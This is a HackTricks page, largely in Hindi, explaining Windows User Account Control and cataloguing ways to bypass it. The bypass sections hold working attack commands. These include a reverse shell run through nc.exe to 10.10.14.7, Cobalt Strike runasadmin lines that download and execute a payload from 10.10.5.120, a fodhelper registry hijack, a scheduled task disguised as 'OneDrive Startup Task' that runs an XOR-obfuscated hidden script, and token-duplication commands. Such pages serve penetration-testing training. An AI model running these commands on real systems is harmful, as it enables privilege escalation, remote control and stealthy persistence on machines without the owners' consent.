UAC - User Account Control

Tip

AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE) Azure हैकिंग सीखें और अभ्यास करें: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks का समर्थन करें

• सदस्यता योजनाओं की जांच करें!
• हमारे 💬 Discord समूह या टेलीग्राम समूह में शामिल हों या हमें Twitter 🐦 @hacktricks_live** पर फॉलो करें।**
• हैकिंग ट्रिक्स साझा करें और HackTricks और HackTricks Cloud गिटहब रिपोजिटरी में PRs सबमिट करें।

UAC

User Account Control (UAC) एक ऐसा फ़ीचर है जो उच्चाधिकार वाली गतिविधियों के लिए एक अनुमति संकेत (consent prompt) सक्षम करता है। Applications के अलग-अलग integrity स्तर होते हैं, और एक प्रोग्राम जिसकी उच्च स्तर है वह ऐसे कार्य कर सकता है जो सिस्टम को संभावित रूप से प्रभावित कर सकते हैं। जब UAC सक्षम होता है, तो अनुप्रयोग और कार्य हमेशा एक non-administrator खाते के सुरक्षा संदर्भ में चलते हैं जब तक कि कोई administrator स्पष्ट रूप से इन अनुप्रयोगों/कार्यक्रमों को सिस्टम पर administrator-स्तरीय पहुँच देने की अनुमति नहीं देता। यह एक सुविधा है जो administrators को अनचाहे परिवर्तनों से बचाती है, पर इसे एक सुरक्षा सीमा (security boundary) नहीं माना जाता।

For more info about integrity levels:

Integrity Levels

जब UAC लागू होता है, तो एक administrator उपयोगकर्ता को 2 टोकन दिए जाते हैं: एक standard user टोकन, जो सामान्य स्तर पर नियमित क्रियाएँ करने के लिए होता है, और एक ऐसा टोकन जिसमें admin privileges होते हैं।

यह page बहुत विस्तार से बताती है कि UAC कैसे काम करता है और इसमें logon प्रक्रिया, उपयोगकर्ता अनुभव, और UAC वास्तुकला शामिल हैं। Administrators अपने संगठन के लिए UAC के व्यवहार को स्थानीय स्तर पर security policies के ज़रिए कॉन्फ़िगर कर सकते हैं (secpol.msc का उपयोग करके), या Active Directory डोमेन वातावरण में Group Policy Objects (GPO) के माध्यम से कॉन्फ़िगर करके Push कर सकते हैं। विभिन्न सेटिंग्स का विस्तार यहाँ चर्चा किया गया है: here। UAC के लिए 10 Group Policy सेटिंग्स हैं जिन्हें सेट किया जा सकता है। निम्न तालिका अतिरिक्त विवरण प्रदान करती है:

Policies for installing software on Windows

Local security policies (अधिकांश सिस्टम पर “secpol.msc”) डिफ़ॉल्ट रूप से इस तरह कॉन्फ़िगर की जाती हैं कि non-admin users को सॉफ़्टवेयर इंस्टॉल करने से रोका जा सके। इसका मतलब है कि भले ही कोई non-admin उपयोगकर्ता आपके सॉफ़्टवेयर का इंस्टॉलर डाउनलोड कर ले, वे इसे admin खाते के बिना चला नहीं पाएंगे।

Registry Keys to Force UAC to Ask for Elevation

एक standard user के रूप में जिनके पास admin अधिकार नहीं हैं, आप यह सुनिश्चित कर सकते हैं कि जब वह “standard” खाता कुछ क्रियाएँ करने का प्रयास करता है तो UAC उन्हें प्रमाण-पत्र (credentials) के लिए प्रेरित करे। इस क्रिया के लिए कुछ रजिस्ट्री कुंजियों को संशोधित करना होगा, जिसके लिए आपको admin permissions की आवश्यकता होगी, जब तक कि कोई UAC bypass न हो, या हमलावर पहले से ही admin के रूप में लॉग इन न हो।

यहां तक कि अगर उपयोगकर्ता Administrators समूह में है, तब भी ये परिवर्तन उपयोगकर्ता को प्रशासनिक कार्य करने के लिए अपने खाते के प्रमाण-पत्र फिर से दर्ज करने के लिए मजबूर करते हैं।

एकमात्र नकारात्मक पक्ष यह है कि इस दृष्टिकोण के काम करने के लिए UAC को अक्षम होना चाहिए, जो कि production वातावरण में होने की संभावना कम है।

रजिस्ट्र्री कुंजियाँ और प्रविष्टियाँ जिन्हें आपको बदलना चाहिए निम्नलिखित हैं (कोष्ठकों में उनके डिफ़ॉल्ट मान दिए गए हैं):

• HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System:
• ConsentPromptBehaviorUser = 1 (3)
• ConsentPromptBehaviorAdmin = 1 (5)
• PromptOnSecureDesktop = 1 (1)

यह Local Security Policy टूल के माध्यम से मैन्युअली भी किया जा सकता है। एक बार बदलने के बाद, प्रशासनिक प्रक्रियाएँ उपयोगकर्ता से उनके प्रमाण-पत्र फिर से दर्ज कराने के लिए संकेत करेंगी।

Note

User Account Control is not a security boundary. इसलिए, सामान्य उपयोगकर्ता बिना किसी local privilege escalation exploit के अपने खाते से बाहर निकलकर administrator अधिकार प्राप्त नहीं कर सकते।

किसी उपयोगकर्ता से ‘full computer access’ के लिए पूछें

hostname | Set-Clipboard
Enable-PSRemoting -SkipNetworkProfileCheck -Force

cd C:\Users\hacedorderanas\Desktop
New-PSSession -Name "Case ID: 1527846" -ComputerName hostname
Enter-PSSession -ComputerName hostname

UAC अधिकार

• Internet Explorer Protected Mode integrity checks का उपयोग करता है ताकि high-integrity-level processes (जैसे web browsers) low-integrity-level data (जैसे temporary Internet files folder) तक पहुँचने से रोके जा सके। यह browser को low-integrity token के साथ चलाकर किया जाता है। जब browser low-integrity zone में संग्रहीत डेटा तक पहुँचने की कोशिश करता है, तो operating system process के integrity level की जाँच करता है और तदनुसार एक्सेस की अनुमति देता है। यह फीचर remote code execution attacks को सिस्टम पर संवेदनशील डेटा तक पहुँचने से रोकने में मदद करता है।
• जब कोई user Windows पर लॉग ऑन करता है, तो सिस्टम एक access token बनाता है जिसमें user’s privileges की सूची होती है। Privileges को एक user’s rights और capabilities के संयोजन के रूप में परिभाषित किया जाता है। token में user’s credentials की भी सूची होती है, जो उन credentials का उपयोग कंप्यूटर और नेटवर्क संसाधनों पर user को प्रमाणित करने के लिए किया जाता है।

Autoadminlogon

To configure Windows to automatically log on a specific user at startup, set the AutoAdminLogon registry key. This is useful for kiosk environments or for testing purposes. Use this only on secure systems, as it exposes the password in the registry.

Set the following keys using the Registry Editor or reg add:

• HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon:
• AutoAdminLogon = 1
• DefaultUsername = username
• DefaultPassword = password

To revert to normal logon behavior, set AutoAdminLogon to 0.

UAC bypass

Tip

नोट करें कि अगर आपके पास graphical access to the victim है, तो UAC bypass सीधा है क्योंकि आप UAC prompt दिखाई देने पर बस “Yes” पर क्लिक कर सकते हैं

UAC bypass की आवश्यकता निम्न स्थिति में पड़ती है: UAC सक्रिय है, आपका process medium integrity context में चल रहा है, और आपका user administrators group का सदस्य है।

यह बताना महत्वपूर्ण है कि यह काफी अधिक कठिन है UAC को bypass करना अगर वह highest security level (Always) पर हो बनाम अगर वह किसी अन्य level (Default) पर हो।

UAC disabled

यदि UAC पहले से disabled है (ConsentPromptBehaviorAdmin is 0) तो आप reverse shell को admin privileges के साथ execute कर सकते हैं (high integrity level) कुछ इस तरह:

#Put your reverse shell instead of "calc.exe"
Start-Process powershell -Verb runAs "calc.exe"
Start-Process powershell -Verb runAs "C:\Windows\Temp\nc.exe -e powershell 10.10.14.7 4444"

UAC bypass with token duplication

• https://ijustwannared.team/2017/11/05/uac-bypass-with-token-duplication/
• https://www.tiraniddo.dev/2018/10/farewell-to-token-stealing-uac-bypass.html

Very Basic UAC “bypass” (full file system access)

यदि आपके पास एक shell है जिसमें user Administrators समूह में है, तो आप SMB के जरिए साझा किए गए C$ को एक नए डिस्क पर लोकल (file system) के रूप में mount the C$ कर सकते हैं और आपको access to everything inside the file system मिल जाएगा (यहाँ तक कि Administrator home folder)।

Warning

ऐसा लगता है कि यह ट्रिक अब काम नहीं कर रही है

net use Z: \\127.0.0.1\c$
cd C$

#Or you could just access it:
dir \\127.0.0.1\c$\Users\Administrator\Desktop

UAC bypass with cobalt strike

Cobalt Strike तकनीकें केवल तभी काम करेंगी जब UAC अधिकतम सुरक्षा स्तर पर सेट न हो।

# UAC bypass via token duplication
elevate uac-token-duplication [listener_name]
# UAC bypass via service
elevate svc-exe [listener_name]

# Bypass UAC with Token Duplication
runasadmin uac-token-duplication powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"
# Bypass UAC with CMSTPLUA COM interface
runasadmin uac-cmstplua powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"

Empire और Metasploit में UAC को bypass करने के लिए कई मॉड्यूल भी हैं।

KRBUACBypass

डॉक्यूमेंटेशन और टूल: https://github.com/wh0amitz/KRBUACBypass

UAC bypass exploits

UACME जो कई UAC bypass exploits का एक संकलन है। ध्यान दें कि आपको compile UACME using visual studio or msbuild करने की आवश्यकता होगी। यह संकलन कई executables बनाएगा (जैसे Source\Akagi\outout\x64\Debug\Akagi.exe) , आपको पता होना चाहिए कि कौन सा आपको चाहिए।
आपको be careful होना चाहिए क्योंकि कुछ bypasses कुछ अन्य प्रोग्राम्स को promtp some other programs कर देंगे जो user को alert करेंगे कि कुछ हो रहा है।

UACME में वह build version from which each technique started working मौजूद है। आप अपनी versions को प्रभावित करने वाली technique खोज सकते हैं:

PS C:\> [environment]::OSVersion.Version

Major  Minor  Build  Revision
-----  -----  -----  --------
10     0      14393  0

Also, using this page you get the Windows release 1607 from the build versions.

UAC Bypass – fodhelper.exe (Registry hijack)

विश्वसनीय बाइनरी fodhelper.exe आधुनिक Windows पर auto-elevated है। जब लॉन्च किया जाता है, तो यह नीचे दिए गए per-user registry path को बिना DelegateExecute verb को validate किए query करता है। वहाँ एक कमांड लगाने से एक Medium Integrity process (user is in Administrators) बिना UAC prompt के एक High Integrity process spawn कर सकती है।

Registry path queried by fodhelper:

HKCU\Software\Classes\ms-settings\Shell\Open\command

</details>
नोट्स:
- यह तब काम करता है जब वर्तमान उपयोगकर्ता Administrators का सदस्य हो और UAC स्तर डिफ़ॉल्ट/लचीला हो (Always Notify with extra restrictions नहीं)।
- 64-bit Windows पर 32-bit process से 64-bit PowerShell शुरू करने के लिए `sysnative` पथ का उपयोग करें।
- Payload किसी भी कमांड हो सकता है (PowerShell, cmd, या किसी EXE पथ)। Stealth के लिए प्रॉम्प्ट दिखाने वाले UIs से बचें।

#### CurVer/extension hijack variant (HKCU only)

हालिया नमूने जो `fodhelper.exe` का दुरुपयोग करते हैं, `DelegateExecute` से बचते हैं और इसके बजाय प्रति-उपयोगकर्ता `CurVer` मान के माध्यम से **`ms-settings` ProgID को रिडायरेक्ट कर देते हैं**। ऑटो-एलेवेटेड बाइनरी अभी भी `HKCU` के अंतर्गत हैंडलर को resolve करता है, इसलिए keys लगाने के लिए कोई admin token आवश्यक नहीं है:
```powershell
# Point ms-settings to a custom extension (.thm) and map that extension to our payload
New-Item -Path "HKCU:\Software\Classes\.thm\Shell\Open" -Force | Out-Null
New-ItemProperty -Path "HKCU:\Software\Classes\.thm\Shell\Open\command" -Name "(default)" -Value "C:\\ProgramData\\rKXujm.exe" -Force | Out-Null
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings" -Name "CurVer" -Value ".thm" -Force

Start-Process "C:\\Windows\\System32\\fodhelper.exe"   # auto-elevates and runs rKXujm.exe

schtasks /create /sc hourly /tn "OneDrive Startup Task" /rl highest /tr "cmd /c powershell -w hidden $d=[IO.File]::ReadAllBytes('C:\ProgramData\VljE\zVJs.ps1');$k=[Text.Encoding]::UTF8.GetBytes('Q');for($i=0;$i -lt $d.Length;$i++){$d[$i]=$d[$i]-bxor$k[$i%$k.Length]};iex ([Text.Encoding]::UTF8.GetString($d))"

$pid = Invoke-RAiProcessRunOnce
$p = Get-Process -Id $pid
$t = Get-NtToken -Process $p
$id = New-NtTokenDuplicate -Token $t -ImpersonationLevel Identification
Invoke-NtToken $id -ImpersonationLevel Identification { Get-NtDirectory "\??" | Out-Null }
$auth = Get-NtTokenId -Authentication -Token $id
New-NtSymbolicLink "\Sessions\0\DosDevices/$auth/C:" "\??\\C:\\Users\\attacker\\loot"